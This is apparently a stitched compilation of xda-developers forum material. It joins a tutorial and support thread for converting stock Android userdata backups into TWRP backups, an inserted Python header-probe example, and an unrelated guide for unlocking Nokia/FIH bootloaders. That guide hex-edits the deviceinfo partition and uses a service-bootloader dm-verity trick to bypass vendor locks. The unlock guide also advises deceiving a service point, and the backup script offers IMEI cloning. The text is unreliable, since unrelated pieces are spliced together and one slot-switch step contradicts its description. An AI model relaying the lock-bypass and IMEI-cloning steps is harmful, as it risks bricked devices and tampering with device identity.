- Android system recovery <3e> with
- "backup user data" functionality
- data must not be encrypted
- external sdcard
Requirements (target device):
- root
- TWRP custom recovery
- working identical ROM pre-installed (same as the source phone)
Before you start:
download this flashable UPDATE-sdcard.Fix.Permissions-signed.zip from osm0sis @ xda-developers to your phone's memory or external sdcard - you might need it later
http://forum.xda-developers.com/showthread.php?t=2239421
TWRP and Internal Storage:
Even if the TWRP recovery process claims not to touch /data/media, it restores files anyway. This is a great side-effect advantage, as we can easily restore pictures and files by simply including them in the backup. However, this will overwrite existing data - please don't use this option unless you know what you're doing!
If apps crash after restoring from TWRP, this might have to do with Internal Storage - the above flashable zip will fix permissions, ownership and SELinux labels for /data/media in case you manually added some files (regarding /data - of course - there is no tool in the world which can do the same for the /data partition - be warned: never copy files, always move files from one Linux file system to another, and never use a Windows file system)
bckp2win.sh is a Linux bash script using GNU tar for creating TWRP archive files from userdata_yyyymmdd_hhmmss.backup files.
In a TWRP backup each data.ext4.win000 file represents a standalone tarball archive - this means each single archive can be unpacked on its own, without concatenating them or having split files spread over multiple archives. Unfortunately I don't know how they do it (I think TWRP uses its own tar implementation), so I decided to write another bash script which is basically doing the same thing (creating multipart standalone tarball archives):
edit: this is the main converting script (and the only file you need)
multi_tar.sh is not limited to Android system recovery <3e> userdata backups and can be used for any scope of application.
This means you can simply create TWRP backups from "any" data source. It summarizes files in an index file until the archive size is reached and then archives from the index with GNU tar. This is a very slow procedure but it works. Optionally it uses gzip compression. (I really don't know how to check the compressed file size from bash without compressing it, therefore it is compressed twice in a 2-pass way; the 1st pass is for checking the size only)
edit: do not download this script, try bckp2win.sh without multi_tar.sh first (press No when asked). It is for splitting large backups only and not required in most cases
twrp_sign.sh is another bash script for creating SHA-2 checksums especially for TWRP backups. But checksums can be disabled in TWRP - therefore it's optional.
Needs ~ 120% of free disk space and takes about ~ 30 min; enjoy your coffee
[TUTORIAL] How to convert a stock backup into a TWRP backup
First of all you need to know that userdata_yyyymmdd_hhmmss.backup files contain user data only. It is NOT a full nandroid backup like TWRP / CWM.
So we can just restore the data partition from TWRP:
userdata_20160823_100259.backup -> data.ext4.win000 -> /data
The data partition contains the internal virtual SD card. It is usually not included in a TWRP backup. It is your decision to manually copy it back to the phone (recommended). But you can also restore the internal virtual SD card from TWRP:
/data/media/0 -> /storage/emulated/0
IMEI and WiFi MAC address:
/data/nvram (NOT recommended)
If there is a copy of the NVRAM partition in folder /data/nvram, the script will delete it by default. However, there is an option to use the IMEI and WiFi MAC address from the backup (clone), instead of from the phone.
Windows users please click here
download UNetbootin -> https://unetbootin.github.io <- scroll this page down for the tutorial
- format the USB flash drive FAT32
- install any Linux distro to the USB flash drive
Reboot your PC from the USB flash drive
to access the boot menu while booting your computer:
- press the appropriate key, F11 or F12, during the initial startup screen
- select the USB boot option in the BIOS boot menu
- boot the Default entry
Congratulations, you have successfully entered your own working Linux system!
It's easy, isn't it?
Now, come back to forum.xda-developers.com
- find the Start Menu in the upper left corner
- open the "Web Browser" from Favorites
- search for "bckp2win" in Google
You can add your keyboard layout from: Settings - Keyboard
Note: the performance of Firefox badly depends on the USB flash drive speed
if it is too slow, try another one, or disable persistence:
- find the syslinux.cfg file on the USB flash drive
- open syslinux.cfg with an editor
- delete --- persistent from the "Try Xubuntu without installing" entry
- save the changes, reboot from the USB flash drive with the "Try Xubuntu without installing" entry
However, without persistence it is a read-only live system and will lose all settings on reboot
Let's begin with the preparations
- copy UPDATE-sdcard.Fix.Permissions-signed.zip to the microSD card / or
- download UPDATE-sdcard.Fix.Permissions-signed.zip to the target phone
- connect the source phone by USB cable / or
- insert the microSD card into the PC's SD card reader
- copy all userdata_20160823_100259.backup files to any folder on the local disk
- download all the zip files from this thread
- unpack the zip files into the same folder on the local disk
Run the shell script in a Terminal
- right-click somewhere in the backup folder, select "Open Terminal Here"
- type "sudo bash bckp2win.sh" in the Terminal
- check disk space
example: when the backup is 2 GB,
Avail must be > 2,4 GB (120%)
when the backup is 55 GB,
Avail must be > 66 GB (120%)
- check the file system type
Type must not be vfat, fat32
all others are allowed
(ntfs, ext4, fuseblk, ...)
This is very important! Otherwise it will fail at the end and waste your time, and you won't know the reason. So please check carefully
- select the file number to extract
- wait a long time, depending on disk speed and backup size (1~2 min / 1 GB)
Halftime break
- when the message Press 'y' to unlock: [y/n] appears - Congratulations! The backup is successfully extracted
(if you need to edit/modify/delete files within the backup, this is the point for a break)
- to continue with re-packing:
answer all questions with No
(or just press Enter for the default):
Android sparse image (simg2img) support -> No
Flash-Friendly File System (F2FS) support -> No
unlock screen lock pattern -> No
clone old IMEI and WiFi MAC address -> No
Restore /storage/emulated/0 -> No
use gzip compression -> No
Extract Internal Virtual SD Card to local disk -> Yes
(this will extract /data/media to the TWRP folder instead, but exclude it from the backup)
- wait for the script to finish
- wait for background processes
(sometimes the script finishes too early; if there is a data.ext4.win000 + data.ext4.win0000 file, just wait for the target size of 1 GB per file)
- if checksums are missing or failed, please manually run twrp_sign.sh again
(successful checksums look like this)
Finally we can restore the new backup
- copy the TWRP folder back to the phone
- boot into recovery mode
- create a failsafe backup (just in case...)
- move the folder to the right location via MTP, or
- Advanced -> File Manager -> TWRP/BACKUPS/<serialno>/<backup folder>
- Options (blue icon at the bottom right) -> Move -> TWRP/BACKUPS/<phone name> -> Swipe to confirm
(in case the converted backup is not visible in the Restore list...)
- restore the converted backup from TWRP
- install the flashable UPDATE-sdcard.Fix.Permissions-signed.zip
(just in case you have added files to data/media...)
- boot the phone
- move/copy all your pictures, videos etc. from the TWRP folder back to the phone
Troubleshooting
If you fail at some point, please try again with more disk space or gzip compression
phone is not showing up on the PC
enable Settings -> Developer options -> Select USB Configuration -> MTP:
- go to Settings -> About phone
- tap Build number seven times until you see a message
- go to Settings -> Developer options
- enable Developer options, confirm Allow development settings
- scroll down to -> Select USB Configuration
- select MTP (Media Transfer Protocol)
My source backup file is not in "userdata_YYYYMMDD_hhmmss.backup" format
This script may work with other archives, but only accepts the "userdata_YYYYMMDD_hhmmss.backup" pattern as input file name. But you can specify any input file or folder as a parameter; the script will scan the folder for known archive types and link the files into the script folder:
sudo bash bckp2win.sh ~/Android/Backup/TWRP/2016-08-23--10-02-59/data.ext4.win*
mkdir: cannot create directory ‘b2wtmp’: File exists
There was a previous session left over; delete the folder ‘b2wtmp’ and try again. You can keep the previous session for testing purposes with parameter -f (force unpack):
sudo bash bckp2win.sh -f
ERROR: something goes wrong. check disk space
The GNU tar unpacking or archiving process may fail for various reasons. However, you can suppress error messages and skip this exit point for testing purposes with parameter -f (force unpack). If you run out of disk space, you can exclude folders from the backup with parameter -e (--exclude PATTERN), for example:
sudo bash bckp2win.sh -e */com.google.android.googlequicksearchbox*
Bugs & Known Issues
extractTarFork() process ended with ERROR: 255
Probably a bug in the script. At the moment, the only solution is manually restoring the backup files. I know it's annoying, but I don't know the reason yet.
- download GNU tar for android
- unpack the zip and copy the tar binary to phone
- in TWRP, copy tar binary to /cache, then wipe data
- in TWRP, go back to -> Advanced -> Terminal
- in Terminal, change directory to backup folder, then run for each file
Code:
chmod 0755 /cache/tar
cd /external_sd/TWRP/BACKUPS/<phone>/2016-08-23--10-02-59*
/cache/tar --selinux --xattrs -P -vxpf data.ext4.win000
(or for compressed files)
busybox gzip -cd data.ext4.win000 | /cache/tar --selinux --xattrs -P -vxp
Please post here for support; I will answer your questions.
found a multipart image, merge files
==================
... merged
try to unpack ...failed
try to mount as *...failed
skip first 512 bytes and try to mount again as ext2, as rfs, as fsfs
... failed
no files in folder "data"
exiting script
What can I do ?
My phone model is Bluboo S1 with Android 7.0. Before I wiped everything out I made a backup with the stock backup, and now I have TWRP 3.2.1. Now I have the phone flashed with BLUBOO_S1_Helio_P25_L_V04_20170908 and it is working, but I want to put my old userdata back because I think all my 230 apps are already installed there.
Please check if your userdata_20180926_141645.backup is an ext4 image. Each file starts with a 512-byte checksum header, followed by the partition image. The ext4 superblock starts at offset 1024 bytes (from the partition start). The ext4 magic number 0xEF53 can be found at offset 0x38 (from the superblock start).
We can skip the (512-byte) checksum + (1024-byte) unused padding, because the superblock starts at 1536 bytes = 0x600 in this case.
Please note the ext4 magic 0xEF53 at offset 0x638.
encrypted files not supported
If the file looks like this (no zeros within, after skipping the 512-byte checksum) it is probably a raw backup of an encrypted data partition.
You can check with hexdump:
Code:
hexdump -C -n1600 userdata_20180926_141645.backup
Unfortunately, these userdata backups are pretty useless since Android 7.0 (encrypted by default), because they do not back up efs/metadata. If you wipe data from stock recovery, the metadata is wiped too. It is impossible to decrypt data without the encryption key (which is stored in metadata).
If you are really lucky maybe it's not too late: do a read back of the metadata partition with SP Flash Tool. Furthermore, check if the userdata backup is encrypted.
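The header check described above (512-byte checksum header, ext4 superblock at +1024, magic 0xEF53 at +0x38) and the "no zeros means encrypted" heuristic can be automated. The following is an added example, not part of the bckp2win.sh script or of any poster's code. It also orders a multipart ".backup", ".backup1", ".backup2" ... set for merging, which the thread describes but does not show. All sample bytes are constructed inline; the layout assumptions are exactly those stated in the post above.

```python
"""Probe an "Android system recovery <3e>" stock backup for an ext4 superblock.

Added example, not part of bckp2win.sh. Layout assumptions (from the thread):
an optional 512-byte checksum header, then a raw partition image whose ext4
superblock starts at offset 1024 and carries the magic 0xEF53 (little-endian
bytes 53 ef) at offset 0x38 within the superblock.
"""
import re
import struct

EXT4_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024
MAGIC_OFFSET_IN_SB = 0x38
HEADER_CANDIDATES = (0, 512)          # try without and with the checksum header

PART_RE = re.compile(r"^(userdata_\d{8}_\d{6}\.backup)(\d*)$")


def order_parts(names):
    """Return the multipart set in merge order: .backup, .backup1, .backup2, ...

    Plain string sorting would put .backup10 before .backup2, so the numeric
    suffix is sorted as an integer. Names not matching the pattern are ignored.
    """
    parts = []
    for name in names:
        m = PART_RE.match(name)
        if m:
            index = int(m.group(2)) if m.group(2) else 0
            parts.append((index, name))
    return [name for _, name in sorted(parts)]


def find_ext4(data):
    """Return the header size (0 or 512) at which an ext4 magic is found, else None."""
    for hdr in HEADER_CANDIDATES:
        pos = hdr + SUPERBLOCK_OFFSET + MAGIC_OFFSET_IN_SB
        if len(data) >= pos + 2 and struct.unpack_from("<H", data, pos)[0] == EXT4_MAGIC:
            return hdr
    return None


def looks_encrypted(data, header=512, window=1024):
    """Heuristic from the thread: a plain ext4 image has long zero runs between
    the checksum header and the superblock; an FDE-encrypted partition is
    uniformly random and shows (almost) no zero bytes at all."""
    sample = data[header:header + window]
    if not sample:
        return False
    return sample.count(0) / len(sample) < 0.02


def probe(data):
    """Classify a backup and report the offset to pass to mount -o loop,offset=N."""
    hdr = find_ext4(data)
    if hdr is not None:
        return {"fs": "ext4", "mount_offset": hdr}
    if looks_encrypted(data):
        return {"fs": "encrypted?", "mount_offset": None}
    return {"fs": "unknown", "mount_offset": None}


# --- constructed sample data (not real backups) ---
def make_plain_image(header=512):
    """Checksum-like header + 1024 bytes of padding + a superblock with the magic."""
    sb = bytearray(1024)
    struct.pack_into("<H", sb, MAGIC_OFFSET_IN_SB, EXT4_MAGIC)
    return bytes(range(256)) * (header // 256) + bytes(1024) + bytes(sb)


def make_encrypted_like(size=2048):
    """Deterministic byte stream with no zero bytes, mimicking FDE ciphertext."""
    return bytes((i * 131 + 7) % 255 + 1 for i in range(size))


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(probe(f.read(4096)))
```

If probe() reports an ext4 image at header 512, the image can be mounted read-only without stripping the header first: `mount -o loop,ro,offset=512 merged.img /mnt/data`. A result of "encrypted?" means the backup is ciphertext and, as the post says, useless without the key held in the metadata partition.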
There was also too little disk space, and I installed the new Ubuntu on the other computer, so I'll try it later.
If you prefer to re-pack the data by yourself, stop the script when it asks for the unlock screen-lock pattern (CTRL + C),
enter the parent directory of the data folder,
and run multi_tar.sh, where the first argument is the destination and all other arguments are source folders.
Note that you can change the output to any file or folder:
replace "data.ext4.win" with "/media/xubuntu/my-drive/Android/my-output-folder/my-file-name"
Code:
sudo bash multi_tar.sh -z -L 1048576 data.ext4.win data --transform 's,^data,/data,'
(with parameters -z for compression and -L for split size, and some string replacement within the archive, replacing "data" with "/data" in this case)
There are still some bugs I am struggling with; restoring in TWRP fails when a single file within the backup has failed.
Please check out my other solution for encrypted backups. You can restore the TWRP backup from this zip instead of restoring from the TWRP menu:
https://forum.xda-developers.com/showthread.php?t=3899918
aIecxs said:
We can skip (512 bytes) checksum + (1024 bytes) unused padding, because the Super Block start is at (1536 bytes) = 0x600 in this case
Hi,
I have exactly the offsets you wrote here, but I do not succeed in mounting my data. Do you have an idea what could be wrong on my side?
Code:
000001d0 ab 0a 44 a3 c5 ee 69 fa 44 78 c2 ca ec 13 bb f5 |..D...i.Dx......|
000001e0 38 f4 e7 ca f2 7c 49 e3 a2 a0 d8 1e e3 f9 94 c5 |8....|I.........|
000001f0 f5 f5 3e c2 6a bc 8a 58 1c ef 0e 8a 91 29 c4 99 |..>.j..X.....)..|
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000600 00 40 02 00 80 fc 08 00 00 10 00 00 77 e3 00 00 |.@..........w...|
00000610 da 10 02 00 00 00 00 00 02 00 00 00 02 00 00 00 |................|
00000620 00 80 00 00 00 80 00 00 00 20 00 00 0f 8e a4 54 |......... .....T|
00000630 0f 8e a4 54 6c 02 ff ff 53 ef 01 00 02 00 00 00 |...Tl...S.......|
Code:
try to mount as ext4
...failed
skip first 512 bytes and try to mount again as ext4
...failed
try to mount as ext3
...failed
skip first 512 bytes and try to mount again as ext3
...failed
try to mount as ext2
...failed
skip first 512 bytes and try to mount again as ext2
...failed
try to mount as rfs
...failed
skip first 512 bytes and try to mount again as rfs
...failed
try to mount as f2fs
...failed
skip first 512 bytes and try to mount again as f2fs
...failed
./bckp2win.sh: line 796: cd: .//b2wtmp: No such file or directory
WARNING: no files in folder "data"
exiting script
Thanks
The script looks buggy; maybe wrong mount options, or it makes a difference when called with "sudo bash bckp2win.sh".
Hello all.
Is there a way to do the inverse (system.ext4.win -> system.img)? Does anybody know a link to instructions?
With that system.img, I can then do: Bootloader> fastboot -S 130M flash system system.img
(if bootloader is unlocked).
Thank you everyone.
Yes, it is possible; check my edited reply later, in 10 hours.
Edit: see my reply in the other thread:
https://forum.xda-developers.com/showthread.php?t=4015725
@e5e197740b what is the error message when using this tool?
aIecxs said:
@e5e197740b what is the error message when using this tool?
Do I need a rooted Tablet for this? I'm not sure I understood all the instructions..
Edit:
So I ran bckp2win.sh in an Ubuntu VM; here is the output:
Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# This script converts "Android system recovery <3e>" stock recovery file
# "userdata_YYYYMMDD_hhmmss.backup" into custom recovery nandroid backup file.
#
# executing file system must be ext2/3/4 otherwise app permissions will be lost.
#
#
run this script as root. type "sudo -i" or "sudo bash bckp2win.sh".
are you root?
Press 'y' to continue: [y/n] y
2,0G userdata_20200609_220537.backup
2,0G userdata_20200609_220537.backup1
2,0G userdata_20200609_220537.backup2
2,0G userdata_20200609_220537.backup3
2,0G userdata_20200609_220537.backup4
2,0G userdata_20200609_220537.backup5
110M userdata_20200609_220537.backup6
13G total
Filesystem Type Size Used Avail Use% Mounted on
/dev/sda5 ext4 98G 45G 48G 49% /
WARNING: Make sure enough free disk space - NOT checked during process!!
1) userdata_20200609_220537.backup
select file number to extract (q to quit): 1
1) "userdata_20200609_220537.backup"
try to unpack as tar (multipart image support)
...failed
WARNING: No ext4 magic number detected. Try it anyway? [y/n] y
OPTION: install support for (EXT4) Android sparse image (simg2img)? [y/n] y
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package android-tools-fsutils is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
android-sdk-libsparse-utils android-sdk-ext4-utils
E: Package 'android-tools-fsutils' has no installation candidate
OPTION: install support for (F2FS) Flash-Friendly File System? [y/n] y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libf2fs-format4 libf2fs5
The following NEW packages will be installed:
f2fs-tools libf2fs-format4 libf2fs5
0 upgraded, 3 newly installed, 0 to remove and 3 not upgraded.
Need to get 185 kB of archives.
After this operation, 568 kB of additional disk space will be used.
Get:1 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 libf2fs5 amd64 1.11.0-1.1ubuntu1 [14.1 kB]
Get:2 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 libf2fs-format4 amd64 1.11.0-1.1ubuntu1 [16.6 kB]
Get:3 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 f2fs-tools amd64 1.11.0-1.1ubuntu1 [154 kB]
Fetched 185 kB in 0s (608 kB/s)
Selecting previously unselected package libf2fs5:amd64.
(Reading database ... 189666 files and directories currently installed.)
Preparing to unpack .../libf2fs5_1.11.0-1.1ubuntu1_amd64.deb ...
Unpacking libf2fs5:amd64 (1.11.0-1.1ubuntu1) ...
Selecting previously unselected package libf2fs-format4:amd64.
Preparing to unpack .../libf2fs-format4_1.11.0-1.1ubuntu1_amd64.deb ...
Unpacking libf2fs-format4:amd64 (1.11.0-1.1ubuntu1) ...
Selecting previously unselected package f2fs-tools.
Preparing to unpack .../f2fs-tools_1.11.0-1.1ubuntu1_amd64.deb ...
Unpacking f2fs-tools (1.11.0-1.1ubuntu1) ...
Setting up libf2fs5:amd64 (1.11.0-1.1ubuntu1) ...
Setting up libf2fs-format4:amd64 (1.11.0-1.1ubuntu1) ...
Setting up f2fs-tools (1.11.0-1.1ubuntu1) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for initramfs-tools (0.136ubuntu6) ...
update-initramfs: Generating /boot/initrd.img-5.4.0-37-generic
Processing triggers for libc-bin (2.31-0ubuntu9) ...
found a multipart image, merge files:
../userdata_20200609_220537.backup
../userdata_20200609_220537.backup1
../userdata_20200609_220537.backup2
../userdata_20200609_220537.backup3
../userdata_20200609_220537.backup4
../userdata_20200609_220537.backup5
../userdata_20200609_220537.backup6
(please wait - up to 15 min - don't worry computer is still alive)
...merged
try to unpack as sparse ext4 image (skipping ... )
...failed
try to mount as ext4
...failed
try to mount as ext3
...failed
try to mount as ext2
...failed
try to mount as rfs
...failed
try to mount as f2fs
...failed
no files in folder "data"
caching file to disk again for second run
(please wait - up to 15 min)
try to mount as ext4
...failed
skip first 512 bytes and try to mount again as ext4
...failed
try to mount as ext3
...failed
skip first 512 bytes and try to mount again as ext3
...failed
try to mount as ext2
...failed
skip first 512 bytes and try to mount again as ext2
...failed
try to mount as rfs
...failed
skip first 512 bytes and try to mount again as rfs
...failed
try to mount as f2fs
...failed
skip first 512 bytes and try to mount again as f2fs
...failed
./bckp2win.sh: line 796: cd: .//b2wtmp: No such file or directory
WARNING: no files in folder "data"
exiting script
So it had to load some stuff off the internet (namely simg2img and F2FS and their dependencies), but it seemed to run through properly, apart from not retrieving any data.
simg2img or f2fs is not required; it's from the days I wasn't aware of the backup format.
try to unpack as tar ...failed
means it doesn't extract with tar(gz), with or without the 512-byte header.
WARNING: No ext4 magic number detected
means it did not find hex 53 ef with or without the 512-byte header (f2fs and ext4 are both checked),
but it tries to mount anyway.
This could mean:
a) the script is not working (@matrix4you claimed this, too)
b) the header is not 512 bytes
c) the backup is encrypted
a) and b) can be double-checked with an unencrypted backup. Do a factory reset, then right after create another backup without booting Android. This should give you a 12 GB backup which can be zipped into less than a few MiB because it is an empty ext4 image.
Edit: did you run the script via 'sudo ./bckp2win.sh'? That would explain the bug in line 796. Usage is 'sudo bash bckp2win.sh'; maybe the behavior is different.
I did go sudo bash.
I can try the reset-backup thing.
So what I did now:
Reset the device, and without rebooting made a backup:
It still creates 7 files, 12 gigs in total.
They are, as expected, seemingly completely empty, apart from the first 512 bytes, although even those are empty in files 4-7.
The first 8 bytes are always the same, both in the empty and the real backup, if the first 512 exist at all.
Here are the first 512 bytes from the first file of the empty backup:
Code:
AB EF CA 9C B0 C5 4A 0A 38 3D BE C5 5E 4F B5 ED DB 14 73 B2 5C 52 64 1B FA 57 83 A1 6A 63 BF 7A 81 4F AF 09 8D 90 07 18 D6 00 68 0B 94 80 62 62 70 4E 35 8E 28 35 2A 65 63 8D 60 6C E6 1B BF 84 22 DC 8D 22 FF BE FA D8 40 A5 37 01 14 DA 80 C0 92 4A 41 24 EA 80 F6 B3 4B 2C 45 A1 17 99 E0 2D DF F5 7E 9D 10 3B 39 DD FE 1E 48 D4 A8 24 81 B4 E1 91 55 BC 2B 80 7D 9E 1B 1C 82 C5 BD 98 59 66 FF 07 00 1E 4F 41 0B 87 4F 17 CC C4 12 2A 50 1E 70 2F 96 61 09 EF 37 B6 A3 7C 01 9C 09 49 D5 0E 98 91 EB 68 09 FE 51 6D D1 7C 4A 15 02 FF 12 5B B2 CA 31 FD 9F 07 8E 26 FA 56 72 F7 BD 55 85 BB F6 F7 59 8C 11 54 B4 E8 04 3E 10 41 B9 32 54 19 A8 BF 0C 5B 40 5D 37 72 68 BA 46 2A E5 C6 98 28 C1 79 DD F6 8E 8F AD 75 43 BA DA 1B 48 DD B9 F8 AB BC 02 6E E3 62 E5 C8 E2 20 60 43 D9 C5 47 E4 81 04 13 A9 04 8C 1E B3 0B 9D 59 B7 D4 CF A9 2F D9 96 93 BA 02 F9 A8 4E D5 FD 7A B2 74 E4 DB 9C 8B 4C 94 CF CD 61 C6 98 E7 88 B7 51 79 E9 0B FB B2 DE 63 66 A5 08 44 24 CE 76 E2 F2 7D 16 80 DA BF 3E F4 58 B3 8C 76 83 62 ED 40 CC 73 6C 28 B8 C7 78 65 8E 11 BB 8D B7 64 4B 66 B7 32 F8 88 14 BB 54 17 D0 52 3D 5A 47 B8 06 D8 00 94 7C 0B FF 7B 07 6E 4A B7 23 A9 6E 91 BB FE 6F 61 C8 0B C5 B3 E9 96 FB 9F 21 33 F8 BF 0A 9A C7 3E ED 31 B5 F5 66 BD 12 1D E9 1F D7 B2 DA 2E FC 3C 22 F4 F4 B6 10 10 BA 7E 9A 41 76 B0 43 91 DE 2E 31 64 59 DD 1E A5 5D 20 D9 5E 17 78 59 12 35 66 35 3A E6 7B 67 D5 64 D7 93 9C F4 01 47 6C 0F 92 4D 45 F9 B8 34 81 0A EA 47 1A 6C 4D 68 C1 6E A0 6C DE 7D 3E 33 06 82 D2 BF 05 82 5D 0E CF 5B E3 15 98 BB 51 98 79 A2 05 8F 7B BC 70 D1 76 35 67 A8 A0 EF
Is there any chance left?
No, there is nothing you can do. What does the script say about the empty backup? Does it mount the ext4 image?
So I had to take a few days off, but I ran the script on the empty backup.
It does mount it as an ext4 image. But I can't find the folder it mounted it to.

[GUIDE] How to unlock the bootloader (alternate method)

Well, this method is different from the paid method that is forbidden by the forum.
The alternate method is explained briefly in Chinese on the following website.
Chinese explanation of this method: https://hikaricalyx.com/2018/04/03/nokia-7-bootloader-unlock-test/
As far as I know, this method has been tested on the following models:
- Nokia 6.1 (TA-1054 only)
- Nokia 7
- Nokia 8
- Sharp Aquos S2
WARNING! THIS METHOD IS PRETTY COMPLICATED AND DANGEROUS!
I'M NOT RESPONSIBLE FOR BRICKING THE DEVICE! DO IT AT YOUR OWN RISK!
FIH-made Android phones shipped with Android 7.x pre-installed can be unlocked with the method I describe here.
Preparations:
- Your phone must be running Android 7.x, or you must be able to downgrade abl/xbl to the ones provided with Android 7.x firmware by other means.
You can find an excuse at the service point to let them downgrade for you, like "My work application is incompatible with Android 8.0" or something similar.
But the Nokia 6.1 Android One global variant ships with Android 8.0 from the factory, so for it this is not likely to be possible.
Install following software on your PC.
- Patched OST LA 6.0.4: https://drive.google.com/open?id=1n91aYT9Di6_v4F3Wjlv8TjfeLc64AcYA
To install it properly, extract the archive, right click on setup.bat and run it with Administrator privileges. You may want to reinstall every Visual C++ Redistributable Runtime.
- QPST, the newer the better, I personally choose 2.7.460, the latest version should be 2.7.472.4. You can find it by simply Googling.
- A Hex editor. You can choose HxD or any other professional Hex Editor like UltraEdit.
And of course, the stock firmware for your phone. For example, I’ve posted the stock firmware for Nokia 7 on xda-developers Nokia 7 forum.
Since the guide involves the proprietary tool OST LA, it only works on Windows. I recommend you use latest Windows 10 stable release to finish the guide.
Minimal OS: Windows 7 Service Pack 1 with latest updates installed, both 32bit and 64bit are acceptable
Let’s get started.
Part 1: Before Unlocking
1. Back up your data on the phone, and log out of your Google Account if you are logged in.
2. Enable Allow OEM Unlocking and USB Debugging to make the following procedure convenient.
3. Extract early stock firmware or I'll upload required abl (to be added).
Part 2: Flash Service abl/xbl
You have multiple methods to flash abl/xbl.
If your phone is running Android 7.1, you can use the old "Edit Phone Information" method I described on the Nokia 6 forum.
But let me show you a method to flash the service bootloader.
1. Enter fastboot mode (Download mode), and check which slot you are using:
Code:
fastboot getvar current-slot
I assume your current slot is A.
2. Now calculate the md5 checksum of your serial number. For example, the md5 checksum of PL2GAM1234567890 is 154b7ad463038ec186aafa5909505695.
If you have no idea about your serial number, execute this command:
Code:
fastboot devices
Expected output:
Code:
PL2GAM1234567890 fastboot
Of course your serial number can't be PL2GAM1234567890, I'm just making an example.
3. Execute these commands to flash service abl and xbl:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot flash abl_a D:\C1N-0-0430-abl_service.elf
fastboot flash xbl_a D:\C1N-0-0430-xbl_service.elf
If fastboot returns "unknown command" when executing the first command, your phone is running Android 8.x.
Try to downgrade the abl by disassembling the phone and using the wire trick to enter EDL.
You'll see how to achieve that when reading Part 4.
The service abl and xbl are extracted from Nokia 7 stock firmware, which can be also used on Nokia 6.1.
4. Reload the service bootloader:
Code:
fastboot reboot-bootloader
Part 3: Enter EDL mode
Skip this part if you can use wire trick to trigger EDL mode.
Execute these commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem reboot-edl
Part 4: Dump a partition
1. Check Device Manager, "Port (COM and LPT)" category to see if your phone is listed as HS-USB QDLoader 9008 (COMx).
If it's listed as HS-USB Diagnostics 9008 or QUSB__BULK in "Universal Serial Bus devices", you need to update the driver manually to HS-USB QDLoader 9008 (COMx), then force reboot your phone and re-enter the EDL mode.
2. Open QFIL, and load the firehose file from stock firmware.
If you're using Nokia 8, you'll also need to change the storage type to UFS in FireHose Configuration.
3. Click "Tools" - "Partition Manager", and click OK.
4. Find deviceinfo (not devinfo) partition, right click on it and click "Manage Partition", then click "Read Image". This will dump deviceinfo partition.
The dumped deviceinfo partition will be placed at "%AppData%\Qualcomm\QFIL\COMPORT_*" with a filename like this:
ReadData_eMMC_Lun0_0xb828_Len2048_DT_15_04_2018_15_16_32.bin
5. Use a hex editor and jump to offset 0x5101; the data will look like this:
Code:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00005000 02 50 ED 13 EF C4 07 C3 67 3B CC 83 E1 7F 0B 7E
00005010 CC 40 DD DF 66 6A E8 52 F4 E8 78 7C 8B 87 CC DC
00005020 0F 45 EE F7 E9 71 E6 B0 DE 53 6E 97 84 10 EA 15
00005030 F3 78 07 B4 30 87 29 E3 1B DF 96 31 DE 30 1B 46
00005040 EC D3 33 F5 19 1D 56 EE 0A 5A A9 48 8D A1 83 80
00005050 F6 BA 29 AC 1A 10 BF FD A9 64 D5 79 4D C2 AF 9B
00005060 BD 62 87 49 07 A6 CB 88 22 6D 8C 65 10 94 CD 2F
00005070 3B B7 0C C9 91 92 67 F5 02 17 32 55 4C 5E 8B E7
00005080 1B 4D 70 65 61 46 CB 63 F4 C3 EE F8 45 E0 8D 48
00005090 6B 1E 1C FB 0C 94 48 BB FE AF 01 98 4F 47 4D 3A
000050A0 2A 5F 7F 3E 1E 49 C9 6D 4A 11 A5 19 D6 F1 E7 91
000050B0 5D B6 C8 A4 FA AA 15 BB 69 5F 8B C8 72 2A DD A5
000050C0 D0 DC 8B 4E 33 C8 20 57 6D D5 B8 D4 BF 17 0E B1
000050D0 30 5B 3E 13 BC FF 08 10 4C E2 3E 12 9F 9A A6 54
000050E0 6B D8 DE 98 D4 D7 44 37 7C 6D 43 CA A4 BA D9 C7
000050F0 BB F1 1F 12 90 8D 0D 4B 1B 1E 04 69 69 FD 44 1B
00005100 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
If data exists between 0x5000 and 0x5100, you'll be able to use this method to unlock. Modify the value at 0x5101 to 0xFF like this:
The data above are shown as an example. You can't use them; you must use your own deviceinfo.
Code:
00005100 06 FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00
6. Save it as deviceinfo_mod.bin to another place and use QFIL to write it back.
Click "Load Image" and choose your deviceinfo_mod.bin. This will write modified deviceinfo back to your phone.
7. Close QPST and reboot your phone to fastboot mode (Download mode).
Part 5: Unlock the phone
1. Remember to keep the OST LA opened to make sure your phone will stay at Download mode.
2. Execute following commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem cert_timecount get
If the output cert_timecount is not zero, you can proceed. Otherwise,
execute these commands and check again:
Code:
fastboot flash deviceinfo D:\deviceinfo_mod.bin
fastboot reboot-bootloader
3. Then unlock your phone with following commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot flashing unlock_critical
(Do confirmation on your phone)
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem unlock-go
(Do confirmation on your phone again)
Now your phone is fully unlocked, with a not-so-serious typo in the bootloader message:
Your device has been unlocker and cann't be trusted.
ID: PL2GAM1234567890
Your device will be continue in 5 seconds.
Part 6: Restore to stock
You may not be able to install further OTA updates unless you switch the slot to the previous build and update again, or reinstall the stock firmware.
To switch the slot, check your current slot with this command (I assume the current slot is A):
Code:
fastboot --set-active=_b
Then reboot your phone and reinstall OTA update.
